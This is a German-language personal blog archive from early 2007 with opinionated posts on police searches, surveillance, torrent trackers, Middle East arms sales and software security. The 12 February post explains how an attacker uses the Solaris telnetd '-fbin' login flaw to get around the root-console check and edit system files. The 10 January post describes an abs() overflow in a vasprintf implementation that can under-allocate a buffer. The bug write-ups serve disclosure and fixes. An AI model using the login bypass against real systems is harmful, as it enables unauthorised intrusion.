Fri Feb 16 2007

[l] Alle meckern immer an dem BKA-Fuzzy rum, aber hey, ich finde, der hat völlig Recht!
Verärgert zeigte sich Ziercke über die Aussage von Bundesjustizministerin Brigitte Zypries (SPD), die vor staatlichen Hackern gewarnt habe. "Dann müsste man auch Polizisten, die mit richterlichem Beschluss eine Wohnung durchsuchen, als Einbrecher bezeichnen", sagte er.
Stimmt genau. Wenn Polizisten meine Wohnung durchwühlen, ist das für mich das selbe wie wenn das Einbrecher tun. Und ich bin entsetzt, wenn ich lese, mit was für trivialen Vorwänden das heutzutage gemacht wird. Der Mann faselt hier was von richterlichem Beschluß, aber in der Realität ist es erstens einfacher für den Richter, das einfach zu unterschreiben, als es abzulehnen (weil er das dann ausführlich begründen muss), und zweitens können Polizisten sich einfach ein "Gefahr im Verzug" aus dem Arsch ziehen und auch ohne richterlichen Beschluß durchsuchen. Ich frage mich ja, wie der BKA-Chef das fände, wenn bei ihm eine "Gefahr im Verzug" Durchsuchung stattfände. Wird wahrscheinlich nicht passieren, weil das ein klassischer "career limiting move" ist, aber gönnen würde ich es ihm. Und zwar zweimal die Woche. Montags und Donnerstags.
Update: Markus schreibt mir gerade, daß eine Hausdurchsuchung sogar schlimmer als ein Einbruch ist, weil man beim Einbruch die dabei entstandenen Schäden von der Versicherung wieder kriegt, bei Hausdurchsuchungen muss man die selber tragen. Gut zu wissen.

Thu Feb 15 2007

[l] Hellseherin löst am Flughafen Prag Terroralarm aus. Sie hatte die Polizei angerufen, weil sie einen Terroranschlag am Flughafen vorher gesehen habe. Die Polizei hat daraufhin Alarm gemacht, fuhr mit Panzerwagen vor, und hat auch bereitwillig dazu gesagt, woher sie ihre Informationen hatten :-) (Danke, Stefan)
[l] Ich hab jetzt ein paar Mails gekriegt zu dem Torrent-Tracker, der auch falsche IPs rausgibt. Das helfe ja nichts, weil unsere Freunde und Helfer trotzdem eine Hausdurchsuchung machen. Und überhaupt, was wenn die dann bei einem Unschuldigen eine Hausdurchsuchung machen!
Tja, grundsätzlich stimmt das natürlich. Aber eine Sache, die offenbar der eine oder andere noch nicht so verinnerlicht hat: unsere Zeiten als Rechtsstaat sind eh vorbei, wenn wir denn jemals einen hatten. Was wir ja z.B. hier nicht haben, was die Amis aber haben: wenn sie bei jemandem eine sich später als illegal herausstellende Hausdurchsuchung wegen Raubkopien machen, und dann Drogen finden, dann können sie den Drogenfund trotzdem gegen den Bürger verwenden. Insofern macht euch da mal keine Illusionen, sondern guckt euch mal das Udo-Vetter-Video vom 23C3 an.
Wenn euch ein Polizist nicht mag, dann macht der mal eben eine "Gefahr im Vollzug" Durchsuchung wegen organisierter Bandenkriminalität und Drogenschmuggel, findet ein paar selbstgebrannte CDs, und dann kriegt man euch halt damit dran. Ob da ein Tracker eure IP raustut oder nicht, erhöht das Risiko m.E. nicht. Daher ist in Diktaturen immer der erste Schritt, daß man die gesamte Bevölkerung kriminalisiert. Dem dienen ja auch Kryptographie-Verbote, Verbote von weichen Drogen, "Haßrede"-Gesetze und Staaten, wo Kritik am Staat illegal ist. Oder Blasphemie-Gesetze natürlich. In Deutschland ist die Raubkopien-Problematik nur der zweite, neue Teil. Traditionell ist die Hauptwaffe des Staates die Steuergesetzgebung, die so unklar und komplex ist, daß man sie im Grunde nicht einhalten kann. Mein Steuerberater hat mir mal im Vertrauen gesagt, daß da auch kein Steuerberater mehr durchblickt. Und so behaupte ich mal, daß die bestimmt 80% der Bevölkerung abgedeckt haben. Die älteren mit Steuern, die jüngeren mit Raubkopien, die Arbeitslosen mit Hartz IV und "Schwarzarbeit". Von dem Rest behauptet man dann eben, er sei Terrorist, und kann ihn unbegrenzt wegsperren. Wenn man bei jemandem eine Hausdurchsuchung macht, wird man im Allgemeinen etwas finden, womit man denjenigen anpinkeln kann. Im Moment können sich Raubkopierer noch mit Plattenverschlüsselung schützen, aber da gab es ja auch schon Ansätze, Key Escrow zu etablieren. Schon Scheiße, in so einem Staat zu leben. Schlimmer noch, wenn die anderen Staaten um einen herum noch übler sind.
Daher: niemand kann verhindern, daß jemand bei euch eine Hausdurchsuchung macht. Aber das mit den Fake-IPs kann, wenn es richtig gemacht wird (daß sich die Fake-IPs z.B. nicht rausmitteln, wenn man mehrfach IPs abruft), dazu führen, daß der Wert der Vorselektion über Tracker-Fragen gesenkt wird, so daß es sich am Ende eher lohnt, einfach bei allen Politikern mal eine Hausdurchsuchung zu machen, weil die statistisch signifikant krimineller sind als Normalbürger, oder so.

Wed Feb 14 2007

[l] Schweizer Journalisten des Landesverrats angeklagt. Nicht irgendwelche, sondern die, die die US-Folterknäste öffentlich gemacht haben. Völlig klar, wer Verbrecher schützt, indem er Beweise zurück hält, macht sich strafbar, außer es handelt sich bei dem Verbrecher um die USA.

Mon Feb 12 2007

[l] Endlich tut mal jemand was für die Demokratisierung der Oscars: "oscartorrents.com". Ich kann mich des Eindrucks nicht erwehren, daß dieser Service nur halbherzig von den Oscar-Veranstaltern getragen wird, weil sie das Defacement am Ende noch nicht weggemacht haben:
To those worried about downloading in case they get sued: by our calculations, your chances of getting nailed are way less than your chances of winning the lottery. Don't think twice about it.
To all intellectual property landlords: we are aware that OscarTorrents might annoy you — but contain your righteous indignation for a while, and think: we're only linking to torrents that already exist. Face it: your membrane has burst, and it wasn't us who burst it. Your precious bodily fluids are escaping.
Für den unwahrscheinlichen Fall, daß das gar kein Angebot der MPAA ist, distanziere ich mich natürlich aufs heftigste davon.
Update: Mhh, habe mal whois gemacht, und die Site ist in … Schweden. Ist das vielleicht doch keine MPAA-Site? Schweden klingt ja eher nach Nobelpreis-Kommittee. Ich hab mal den Link weggemacht, bevor mich am Ende noch jemand abmahnt :-)
Also irgendwie ist die Rechtslage ja schon unbefriedigend. Nehmen wir mal an, auf der Seite gäbe es illegale Inhalte. Ich weiß das nicht, weil ich keinen davon angeguckt oder auch nur runtergeladen habe. Nicht mal die Torrent-Dateien. An sich muss man doch in unserem Rechtssystem erst einmal von der Unschuld des Angeklagten ausgehen. Ich muss also bei der Site auch erst mal davon ausgehen, daß das legal ist. Nehmen wir mal an, ich hätte jetzt Zweifel, und ich würde mir einen der Torrents testweise runterladen. Nehmen wir weiter an, das wäre wirklich eine Raubkopie (ich kann das ja immer noch nicht glauben, daß es sowas im Internet wirklich gibt). Dann mache ich mich beim Test-Runterladen schon angreifbar, richtig? Und was soll dieser Blödsinn mit dem "offensichtlich illegal"? Wieso ist allofmp3 offensichtlich illegal, amazon aber nicht? Mich dünkt, wir brauchen da mal dringend eine Komplettreform des Urheberrechts.
[l] Der Sun telnetd Bug, über den Ilja und ich uns auf der Comedy auf dem 23C3 lustig gemacht hatten, spricht sich jetzt offenbar langsam herum :-)
Übrigens kann man mit dem Bug nicht direkt -froot machen, weil Solaris login ein Check hat, der Root-Logins nur auf der Konsole zuläßt per Default. Wie umgeht man das als Angreifer? Man loggt sich mit "-fbin" ein, und editiert dann das zuständige File. Denn bei Solaris gehören wichtige Systemdateien nicht root, sondern bin. Ich habe das schon immer für einen furchtbaren Fehler gehalten, aber hey, bei Sun ist man beratungsresistent.
Ich erwähne das hier, weil ich Jörg Schilling mal einen Bugreport geschickt habe, daß seine Crapware sich bei make install immer als User bin installieren will, und den gibt es bei mir aus Sicherheitsgründen nicht. Jörg hat mich dann unflätigst angepinkelt, bin hätte es ja schon immer bei Unix gegeben, und ich wisse ja nicht, wovon ich rede, und überhaupt sei ein User bin kein Sicherheitsproblem. Tja, Jörg, so kann das gehen.
Was dem einen oder anderen vielleicht nicht so klar ist: telnet filtert man in der Firewall, keine Frage, aber die meisten Banken, Telcos und so weiter haben per X.25 weite Teile ihrer Infrastruktur erreichbar. Wenn ich im Ministerium für Homeland Security säße, würde ich jetzt vermutlich gerade heftig herum rotieren. Auf einschlägigen Kanälen erzählt man sich, daß auch weite Teile von .mil gerade über diese Lücke geownt werden.

Sun Feb 11 2007

[l] Indymedia hat ein schönes Plakat zur Vorratsdatenspeicherung gemacht. So schön, daß ich das hier gleich mal einbette.
(lokale Kopie)
Update: Das ist nicht von Indymedia, sondern von Ricardo Cristof Remmert-Fontes vom AK Vorratsdatenspeicherung. Dank an ILF für den Hinweis.

Wed Feb 7 2007

[l] Ich hab mich ja hier schon ein paar Mal über die Fundi-Christen und "The Rapture" lustig gemacht, aber heute hab ich einen tollen Satz gelesen, da müsste man echt ein T-Shirt draus machen:
I'm an atheist, but there's a part of me that does hope that the evangelicals are right, and the Rapture is coming. Can you imagine how much nicer the world will be once they all go away?
Muhahaha
[l] Moan, diese Security-Branche wird immer schlimmer. Jetzt gibt es gerade einen Fad, daß Leute Hashes auf Mailinglisten oder Blogs posten. Was für eine Kinderkacke. Angefangen hat Thomas Ptacek von Matasano (die sind eh eine kleine Bude, und denen laufen gerade die Leute weg; ich weiß gar nicht, ob da außer Thomas überhaupt noch einer arbeitet), der hat dann auch gleich noch seine Krypt0-L33tness unter Beweis gestellt, indem er gezeigt hat, daß er weiß, was eine Nonce ist. Gut, wenn ein Depp das macht, aber dann hat zu meinem großen Entsetzen auch noch Halvar mitgemacht, und von dem hätte ich so eine Kinderkacke echt nicht erwartet. Leute, wenn ihr was habt, dann veröffentlicht es. Da ist heute nun echt keine Schranke mehr mit verbunden. Jeder Arsch hat ein Blog. Tut es da rein, announced einen Link statt des Hashes auf einer Mailingliste, und dann wird niemand bestreiten können, daß ihr es zu dem Zeitpunkt kanntet. Mann Mann Mann. Daß die nicht merken, wie lächerlich sie sich mit so einem Mumpitz machen! Selbst Joanna, die ja sonst auch immer unangenehm mit ihrer Geheimniskrämerei-Leetness-Simulation unangenehm auffällt, ist noch nicht so tief gesunken.
Update: Dave Aitel (mein besonderer Freund) hat sich tatsächlich nicht entblödet, da noch einen drauf zu setzen:
I'm not going to post any [hashes] since it gives people a way to track the amount and timing of your research.
Nicht zu fassen.
[l] Die Russen betreiben ja gerade mal mit den Amis im Irak Containment-Politik, indem sie den befreundeten Nachbarn Luftabwehr liefern. So wenig Bodentruppen, wie die Amis im Irak haben, sind sie überhaupt nur wegen ihrer Lufthoheit konkurrenzfähig. Und Russland hat dem Iran und Syrien mal aktuelle Luftabwehr verkauft; das sind genau die beiden Regimes, bei denen die Amis rumheulen, daß die die Aufständischem im Irak bewaffnen.
Die Amis haben sich dann auch bei Putin beschwert, und Putin hat sich mit dem Hinweis verteidigt, das seien auf Fahrzeuge montierte Systeme, die man nicht so einfach abbasteln und auf die Schulter nehmen könne. Genau das haben die Syrer offenbar jetzt ein Jahr lang gemacht und verteilen die Raketen im Irak, jedenfalls kommen da gerade alarmierend viele Hubschrauber im Irak runter.
Die Ironie der Geschichte ist, daß das exakt die Strategie war, mit der die Amis damals den Russen in Afghanistan "ihr Vietnam gegeben" haben. Jetzt geben die Russen halt den Amis ihr Vietnam zurück. Mit dem zusätzlichen Bonus, daß sie die Systeme nicht verschenken, sondern noch dafür bezahlt werden. Da werden gerade einige Sektkorken im FSB knallen :-)
Und wenn die Amis da im Irak langsam aufgerieben werden, haben sie auch keine Hand frei, um da mal im Iran einzumarschieren. Und die Strategie der Amis beginnt ja immer mit einem dicken Luftangriff, daher ziehen die Amis da auch gerade fett Flugzeugträger im Golf zusammen. Der Luftangriff funktioniert natürlich nur, wenn die Gegenseite keine anständige Luftabwehr hat, und hier hat Russland dem Iran ja gerade die amtliche Variante verkauft (Tor-M1). Das sind so richtig truck-mounted heavy-duty mit Steuercomputer und so weiter, kein Vergleich zu den Schulter-Teilen, mit denen man vor allem Hubschrauber runterholt. Da würden die Amis keine Freude haben gegen mit ihren Flugzeugträgern.
Es ist übrigens ganz interessant, mal die Systeme zu vergleichen: Igla (die Schulter-Raketen oder auch MANPADs) und Tor-M1 (die Heavy-Duty-Variante). Tor kann sogar Cruise Missiles und Laser Guided Bombs runterholen, letzteres sind genau die Bunker Buster, mit denen die Amis im Iran die Atomanlagen plätten wollten.
Wenn der Iran da Zugriff auf solche Technologie hat, stellt sich die Frage, ob die Amis dann da ihre UFO-Technologien hervor holen. Man sagt z.B., daß sie da schon Experimental-Railguns auf ihren Flugzeugträgern installiert haben sollen (passender Userfriendly).

Sun Feb 4 2007

[l] Und langsam nähern wir uns auch dem wahren Grund, wieso die Bundeswehr so zurückhaltend ist, wenn es um Tornado-Aufklärflüge über Süd-Afghanistan geht: sie haben Angst, daß die Tornados abgeschossen werden könnten.
Aufmerksame Beobachter werden sich erinnern, wo die Mudschahedin Boden-Luft-Raketen zum Schulter-Abschuß her haben: von den Amis, damit sie den Russen ihre ganzen Hubschrauber abschießen können (was sie auch gemacht haben). Aber offenbar sind von den "über 2000" Stinger, die die Amis geliefert haben, noch zwei-drei übrig.
Also ich sehe da eine Win-Win-Situation für die Bundeswehr. Endlich werden wir die ganzen alten Schrott-Tornados los, und die Bundeswehr kann dann auch sinnvoll begründen, wieso wir jetzt ganz viele Eurofighter kaufen müssen. (Danke, Timo)
[l] Only in America: 15jähriges Mädchen verhaftet, weil sie Nacktfotos von sich gemacht und ins Internet gestellt hat (Danke, Ulrik)

Fri Feb 2 2007

[l] Braucht jemand Geld und kann kurzzeitig sein Gewissen abschalten? ExxonMobil lobt 10.000 Dollar für Wissenschaftler aus, die die Thesen aus dem Weltklimabericht der Uno widerlegen können. Das ist doch mal ein toller Job! Endlich mal ein ethisch unbedenklicher Weg, Geld zu verdienen!1!!
Na und ExxonMobil kann es sich ja auch leisten, die haben schließlich 2006 mehr Umsatz gemacht als Österreich.
[l] Chirac sagt versehentlich die Wahrheit:
Es wäre "nicht sehr gefährlich", falls der Iran eine oder zwei Atombomben hätte, sagte Chirac in einem am Donnerstag veröffentlichten Interview.
Bei einem Einsatz von Kernwaffen würde Teheran "dem Erdboden gleichgemacht".
Natürlich hat er das sofort zurückzuziehen versucht. Wo kämen wir da hin, wenn jemand das Volk zur Abwechselung mal nicht verarscht?!

Wed Jan 31 2007

[l] Schon ein paar Tage alt, aber lesenswert: Uranschmuggel-Story in der New York Times. Die haben da in Georgien einen Russen aufgegriffen, der in zwei Plastikbeuteln in seiner Lederjacke hochangereichertes Uran durch die Gegend karrte, als Testware für einen größeren Deal. Und sie haben Fotos der Plastikbeutel. Das ist direkt Atombomben-Material. Krasse Scheiße.
Danke an Alexander, der mich auf diese Economist-Story aufmerksam gemacht hat, die darauf linkt.
Die Story listet noch mehr solche Fälle, wo sie kiloweise hochangereichertes Uran aufgegriffen haben, das in Teedosen und so rumgetragen wurden.

Mon Jan 29 2007

[l] Muhahaha, ausgerechnet der Bolton wirft Bush Fehler vor. Das war der völlig beratungsresistente und merkbefreite Ultra-Hardliner, den Bush zum UNO-Botschafter gemacht hatte, damit er da mal auf die Kacke kloppt. Das Schoßhündchen Bushs. Tja, aber Bushs Approval Ratings sind gerade um die 20%, da wird es langsam zu einer sicheren PR-Strategie, über Bush zu meckern.

Fri Jan 26 2007

[l] Das wird ja in England zunehmend schwieriger, das Aufstellen neuer Überwachungskameras zu begründen. Ich freue mich daher über die gerade komödiantischen Begründungen, die da in letzter Zeit kommen. Heute der vorläufige Höhepunkt: Die stellen in Schottland jetzt Überwachungskameras zur Sicherung von Verkehrskameras auf, offenbar weil die ihnen so häufig von verärgerten "Kunden" kaputt gemacht wurden.
[l] Ich hatte ja schon das Blog der Opentracker-Leute erwähnt, und heute ist da mal wieder ein schöner Lacher drin: irgend sone obskure polnische Warez-Torrent-Paysite hat offenbar ihren eigenen Tracker zugemacht und im DNS jetzt den Tracker meiner Kumpels eingetragen. Also echt mal, wie bekloppt muss man eigentlich sein in der Szene? Kann einem da in Polen so wenig passieren seitens der Polizei, daß die sich da keine Sorgen machen müssen, wenn ihre Kundenliste in die Hände von ihnen unbekannten Leuten im Ausland fällt? Oh Mann, ey.
[l] Weil das mit den Integer Overflows so haarig ist, habe ich mal eine Webseite dazu gemacht. Bisher ist die noch ein bißchen unrund, und es fehlt auch noch der Teil, wie man Range Checks mit Zeigern macht. Aber ich hoffe, daß die so schon mal Leuten hilft. Wer nen Fehler findet: bitte melden.
[l] Ich habe ja hier schon ein paar Mal von dem neuesten Scam von Verisign geredet, wo sie für noch teureres Geld noch wertlosere SSL-Zertifikate verkaufen wollen. Die sind dann "extended validation" Zertifikate, und, äh, Verisign haftet selbstverständlich immer noch für gar nichts, aber, uh, sie haben ein bißchen was geprüft dieses Mal!1!!
Der Browser (als IE7, Mozilla macht bei diesem Humbug nicht mit) soll dann die URL-Leiste grün hinterlegen.
Jetzt ist eine Studie rausgekommen, die zeigt, daß mit Extended Validation Certificates Phishing-Erkennungsraten nicht steigen. Im Gegenteil, wenn man die User schult, sinken die Phishing-Erkennungsraten sogar. Und wer hat die Studie gemacht? MS Research. Autsch!

Thu Jan 25 2007

[l] Ich hatte gestern eine interessante Diskussion mit Frank. Die Bush-Junta hat gerade bekannt gegeben, daß sie ihre strategische Ölreserve verdoppeln will.
Mhh, wieso würden sie das tun? Die Reserve ist bereits auf historischem Rekordstand.
Eine Theorie liegt schon mal direkt auf der Hand: sie nehmen an, daß es im nahen Osten demnächst doll wumm macht, und dann die Ölversorgung zusammen bricht, und wollen selber ein paar Wochen aushalten können. Für den Rest der Welt heißt das: "Oje, die Amis wollen den Iran angreifen, wir müssen auch schnell unsere Ölreserve hochschrauben!", und siehe da: China, Indien und Südkorea wollen dann auch gleich mal Öl nachkaufen. Nun verdoppelt man die strategische Ölreserve nicht über Nacht, das sind ja größere Mengen, das dauert Monate. Insofern heißt das nicht, daß morgen der nahe Osten explodiert.
Vielleicht fragt sich jemand, wieso Europa da nicht auch sofort aufspringt. Nun, wir kaufen unser Öl aus Russland und sind vom nahen Osten nicht so abhängig.
Und es geht nicht nur ums Öl. Bei China gibt es noch ein anderes Detail: die sitzen da auf einem immensen Dollarberg, der immer weniger wert wird, je mehr Geld die Amis nachdrucken. Und daher hat China die Tage bekannt gegeben, daß sie damit strategische Rohstoffreserven aufbauen wollen, und damit wird es vermutlich nicht nur um Öl gehen, sondern auch um Kupfer, Eisen, Kohle, Beton. Sachen, die knapp sind und gebraucht werden.
Ich denke mal, da muss man nicht einfach daneben stehen und sich ärgern, wenn die Rohstoffe hier teurer werden, da kann man auch mit verdienen, indem man geschickt an der Börse investiert. Mal gucken, was für Optionen sich da anbieten.
Ach so, zur Diskussion mit Frank. Frank meinte, die Amis wollen ja eigentlich gerade den Iran austrocknen, indem sie den Ölpreis drücken, damit dem Iran die Öleinnahmen wegbrechen. In diesem Kontext ist das gerade die denkbar schlechteste Gelegenheit, das Aufstocken der strategischen Reserven zu verkünden. Das läßt sich im Grunde nur durch einen Krieg der Faktionen innerhalb der USA erklären, wie ihn ja Greg Palast schon seit längerem propagiert. Die Neocons wollen den Iran austrocknen, und die Ölbarone haben das mal eben vollständig platt gemacht mit der Ölreserve-Nummer. Die Neocons waren ja auch die, die in den Irak wollten, um das irakische Öl auf den Markt fluten zu lassen, und über den dann kleinen Ölpreis die Saudis und den Iran auszutrocknen, und das ist ja bisher auch schon von den Ölbaronen verhindert worden.

Sun Jan 21 2007

[l] Achmadinedschad hat verstanden, daß die Saudis den Ölpreis senken, um dem Iran zu schaden. Die Saudis selber haben zwar genug Grund, dem Iran nichts Gutes zu wollen, aber die werden sich das sicher von den Amis haben versilbern lassen. Ich berichtete ja, daß die Saudis gerade so viel Profit gemacht haben, daß sie zwei Jahre lang ganz ohne Öleinnahmen verkraften könnten, aber wieso würden sie das tun wollen? Die mögen den Iran schon länger nicht, und haben gerade keinen spezielle Anlaß, ihn mehr als sonst bekämpfen zu wollen. Meine Vermutung ist, daß die Saudis sich den "Verdienstausfall" von den Amis bezahlen lassen. Plus Zinsen. Denn die Amis haben gerade am meisten zu verlieren, wenn der Iran mit seiner Nummer durchkommt.
Wer es nicht weiß: Saudi Arabien sind Sunniten, Iran sind Schiiten, das sind die beiden großen konkurrierenden Fraktionen im Islam, die sich im Irak nen Proxykrieg liefern. Hier ist noch ein Artikel dazu.

Mon Jan 15 2007

[l] So, jetzt habe ich zwei Wochen meines Lebens damit verplempert (gut, nicht die ganzen zwei Wochen), in Werner Kochs stinkenden Gnupg-Sourcen nach Bugs zu gucken. Wer da schon mal drauf geguckt hat, wird sehen, daß das eine Menge Holz ist. Ich habe da jetzt eher oberflächlich mal drüber geguckt, und das hat schon gereicht, um mir ernsthaft Sorgen zu machen.
Was tut man in solchen Fällen? Man spricht den Autor an. Habe ich gemacht. Erst mal als Testballon eine Frage zu seinem ASN.1-Code, den Funktionsnamen ins Subject.
Schreibt er mir zurück, ich müsse schon sagen, wo ich diese Codefragmente genau gefunden hätte. Ich schreib also zurück, äh, Funktionsname == Subject. Gut, übersehen, danke ich mir, kann schon mal vorkommen. Was kommt zurück?
Wenn Du nicht in der Lage bist halbwegs anständige Informationen zu liefern, kann ich Dich wohl kaum unterstützen.
Diese komplette Fehleinschätzung der Dinge ist mir bisher nur einmal unter gekommen: bei Jörg Schilling. Leute, wenn ich in eurem Code Bugs finde und euch das mitteile, dann bin ICH der Unterstützende, und zwar unterstütze ich euch. Nicht umgekehrt. Wer da der Illusion erliegt, daß er als Autor mir Support zukommen läßt, der vertreibt seine einzige Chance auf kostenloses Bugfinden, und — er hat es auch nicht anders verdient. Aber wartet, geht noch weiter.
Was glaubst Du wohl, wie oft ich so eine Funktion hier rumfliegen habe.
Ich habe geguckt. Einmal in gnupg 1.4.6 und einmal in gnupg 2.0.1, und zwar der identische Code, cut&paste. Soviel dazu, Werner. Was soll ich sagen, auf solche Spirenzchen habe ich überhaupt gar keinen Bock. Dann kann gnupg halt von mir aus schlecht bleiben. Ich habe mal ein paar Vorträge auf Sicherheitskonferenzen angemeldet, "Auditing GnuPG", da werde ich dann halt die Details erzählen, und demnächst taucht dann hier ein Patch auf, den könnt ihr dann alle haben. Das war jedenfalls mit Sicherheit das letzte Mal, daß ich ihm zu helfen versucht habe.
Im Übrigen fände ich das alles nur halb so erbärmlich, wenn Werner nicht öffentliche Förderkohle abgegriffen hätte, um seine Softwareentwicklung zu finanzieren. Damit ist er jetzt bei mir persönlich auf einer Ansehensstufe mit Steuerhinterziehern.

Fri Jan 12 2007

[l] Dieser ganze Hoopla über das iPhone ist mir ja mal wieder völlig unklar. Das Produkt wird genau so schlecht wie die ganzen anderen Appleprodukte. Ich meine, hallo, kann kein UMTS? Die Apple-Fanboys hinter dem Reality Distortion Field reden sich gerade selber ein, daß das nicht schlimm ist, und Apple wird in fünf Jahren eine Version mit UMTS rausbringen, und dann werden alle noch ein iPhone kaufen und so tun, als hätte es nie eines ohne UMTS gegeben. Wie immer. Die Leute SIND einfach so dämlich.
Soweit business as usual. Aber nun gibt es tatsächlich Leute, die glauben, Apple würde sie für ihr Telefon Anwendungen bauen lassen (wie das bei allen anderen Mobiltelefonen ja auch geht). Nun guck mal einer schau:
"You don't want your phone to be an open platform," meaning that anyone can write applications for it and potentially gum up the provider's network, says Jobs. "You need it to work when you need it to work. Cingular doesn't want to see their West Coast network go down because some application messed up."
Soviel zum iPhone. Liebe Apple-Fanboys, lasst mich euch ins Gesicht sagen: HAHAHAHAHAHA.
Und noch was: Cingular kriegt gerade so tolle Presse wegen des iPhone, da muss man doch was tun: AT&T (Eigentümer von Cingular) will die Marke auflösen und wieder zu AT&T umbenennen. Das haben sie letztes Mal mit SBC Communications gemacht, und das hat sie ne Milliarde Dollar gekostet. Ich denke mir immer, wenn ich so was lese: eine Milliarde hier, eine Milliarde dort, nach einer Weile summiert sich das zu richtig Geld! :-)
[l] Einer der Haupt-Coolnessgründe für meine libowfat ist ja das hochskalierbare Event-Completion API, mit dem man tausende von Sockets verarbeiten kann. Ich habe damit erst mal einen Webserver gemacht, aber eine andere Anwendung bietet sich ja förmlich an: ein Bittorrent Tracker. Nun hat ein Kumpel einen gehackt, und er skaliert wohl deutlich viel besser als dieser Python-Grütz von Bram Cohen, insofern schaut euch mal den opentracker an, wenn ihr mal nen Torrent-Tracker braucht.

Wed Jan 10 2007

[l] Ich guck mir ja gerade gnupg an, um zumindest eine lokale Version zu haben, der man ein bißchen vertrauen zu können, und bin dabei auf eine Implementation von vasprintf gestoßen. Das ist eine GNU-Extension, die wie sprintf arbeitet, aber der Ziel-Puffer wird dynamisch alloziert, d.h. kann in der Theorie nicht zu klein sein. Diese Implementation läuft erst mal den Format String durch und rechnet die Maximalgröße aus, den man allozieren muss, und hat dafür den folgenden Code:
```
          if (*p == '*')
            {
              ++p;
              total_width += abs (va_arg (ap, int));
            }
```
Sieht ja an sich OK aus, außer man beschäftigt sich mal mit der Zahlendarstellung in Computern. Im Zweierkomplement gibt es eine negative Zahl (0x80000000 auf 32-bit Systemen), für die es keine Positiv-Darstellung gibt. Wenn man diese Zahl negiert, kommt sie wieder selbst raus. Für abs() bedeutet das:
```
abs(0x80000000) == 0x80000000 == -2147483648
```
Für diesen Code heißt das, daß die offensichtlich unterliegende Annahme falsch ist, daß dieser Code immer nur Zahlen drauf addiert. Insbesondere kann man so den Code dazu kriegen, weniger Platz zu allozieren, als dann am Ende reingeschrieben wird.
Was mich ja besonders irritiert: dieser Code kommt von libiberty, das ist Teil von gcc/binutils/gdb. Das ist noch keinem aufgefallen?
Und als ich gerade dabei war, dachte ich mir, mhh, printf liefert die Anzahl der Zeichen zurück, die er hätte schreiben wollen. Als int. Was, wenn das so groß wird, daß es negativ wird? Sollte printf das abfangen? -1 zurück geben? Mal gucken, was die glibc macht:
```
#include <stdio.h>int main() {
  printf("%d\n",snprintf(0,0,"%*d %*d",0x40000000,1,0x40000000,1));
}
```
Wenn man das Programm aufruft, frißt er ein Gig RAM, läuft 17 Sekunden (auf meinem fetten Athlon 64), und schreibt dann -2147483647.
Ich hab das jetzt für die dietlibc so gemacht, daß *printf dann -1 zurück gibt. Offenbar ist das unter Solaris jetzt schon so, und wenn ich nicht der erste bin, der das so macht, dann trifft mich auch keine Schuld wegen der Kompatibilitätshölle :-)
Ich habe auch gerade eine Mail vom mirBSD-Projekt gekriegt, da hat jemand den Eintrag hier gesehen und nen Patch eingespielt, die liefern jetzt auch -1 zurück. Das war fix, keine zwei Stunden Turnaround!

Tue Jan 9 2007

[l] Spaß mit Apple-Mitarbeitern: Troll pwning! ioerror hat auf dem 23c3 bei dem Vortrag über Filevault mitgemacht.
[l] Microsoft hat eine schöne Ausrede für Vista gefunden: Die NSA hat mitgemacht bei Vista. Wenn jetzt was kaputt ist, können sie es der NSA in die Schuhe schieben.
Lacher am Rande:
For about four years, Microsoft has tapped the spy agency for security expertise in reviewing its operating systems, including the Windows XP consumer version and the Windows Server 2003 for corporate customers.
Und hey, bei XP konnte das ja jeder sehen, wie gut das geklappt hat. Die paar hundert Exploits, die es da gab, … ohne die NSA wären das sicher Tausende gewesen!

Mon Jan 8 2007

[l] Na klar, liebe Polizei, tretet noch mal nach, wir haben noch zu viele rauchende Reste von Grundrechten in diesem Lande: Alle Kreditkarten Deutschlands überprüft. Womit begründet man sowas? Na klar, Kinderpornographie.
Update: Hier ist der Heise-Artikel dazu, denn zum Spiegel darf man ja an sich nicht linken, die lassen ja die Artikel nach nen paar Monaten verschwinden. Oh und noch ein Detail, das ihr hoffentlich alle gesehen habt, aber ich weise da noch mal explizit darauf hin: die hatten bereits den Computer beschlagnahmt und darauf eine Liste von 26500 Kunden gefunden. Es bestand gar kein Grund, da jetzt noch weitere Kreditkarten durchzugehen. Das haben sie nur mal gemacht, um zu gucken, ob sie damit durchkommen. Und hey, klar kommen sie damit durch. Solange Gestalten wie Josef Stoible hier das Ruder in der Hand haben…
[l] Weißrussland hat die Ölpipeline Richtung Deutschland zugemacht. War ja absehbar. Der überraschende (oder vielleicht auch eher nicht überraschend sondern traurig) Teil ist aber das Statement des BND-Präsidenten am Ende des Artikels:
Ein zentrales Thema in diesem Jahr sei es daher, zuverlässige Informationen über Konflikte in den betroffenen Staaten zu sammeln und zur Verfügung zu stellen, sagte Uhrlau.
Oh, doch jetzt schon, ja? Na da ist der BND ja mal wieder am Puls der Zeit!
Für eine konkrete Bewertung des Falles durch die deutschen Geheimdienste sei es noch zu früh.
Ich bin ja immer wieder erschrocken, daß solchen Knalltüten von unseren Steuermitteln der Lebensabend finanziert wird, während sie der normalen Bevölkerung diese Riester- und Rürup-Verarsche andrehen wollen.

Sat Jan 6 2007

[l] Also von mir aus können wir die EU jetzt auch wieder auflösen. Da kommt ja echt nur Scheiße bei rüber, ein Rückschritt nach dem nächsten, und alle schlechten Gesetze werden jetzt auf EU-Ebene gemacht, damit sie dann hier sagen können, ihnen seien die Hände gebunden. Mir hat ja neulich auf dem Congress einer erzählt, daß die Gesundheitskarte auch auf ein EU-Mandat zurück geht und bis 2008 umgesetzt sein müssen, da könne man jetzt gar nichts mehr gegen tun.
Konkret geht es mir heute um diese Meldung: Ambulanzen in England reagieren nicht auf Notruf, weil sie laut EU-Recht zur Mittagspause verpflichtet waren. Klar, da muss man abwägen, und Mittagspause geht natürlich vor.

Thu Jan 4 2007

[l] Nachdem wir uns im Fnord-Rückblick über die Verteidigungsfall zum Bundeswehreinsatz im Inneren lustig gemacht haben, exhumiert Schäuble die Idee, will einen "Quasi-Verteidigungsfall" ausrufen, und dann zivile Flugzeuge abschießen, wenn sie seiner Ansicht nach von Terroristen kontrolliert werden.

Sun Dec 31 2006

[l] Kurzer Kommentar noch zum 23C3-Feedback: Pentabarf (das Web-System) hat ein bißchen Schluckauf. Man sagte mir, wenn das nicht geht mit eurem Kommentar, dann probiert es bitte später nochmal.
Weil mich da einige Leute drauf angesprochen haben: das Codequartett gab es nicht, weil es nicht reingewählt wurde. Der CCC hat dieses Jahr von Autokratie auf ein Kommittee umgestellt. Das hat den Vorteil, daß kein Einzelner Schuld hat, wenn eine Veranstaltung nicht genommen wird, aber es hat eben auch den Nachteil, daß am Ende keiner Schuld an irgendwas ist. :-)
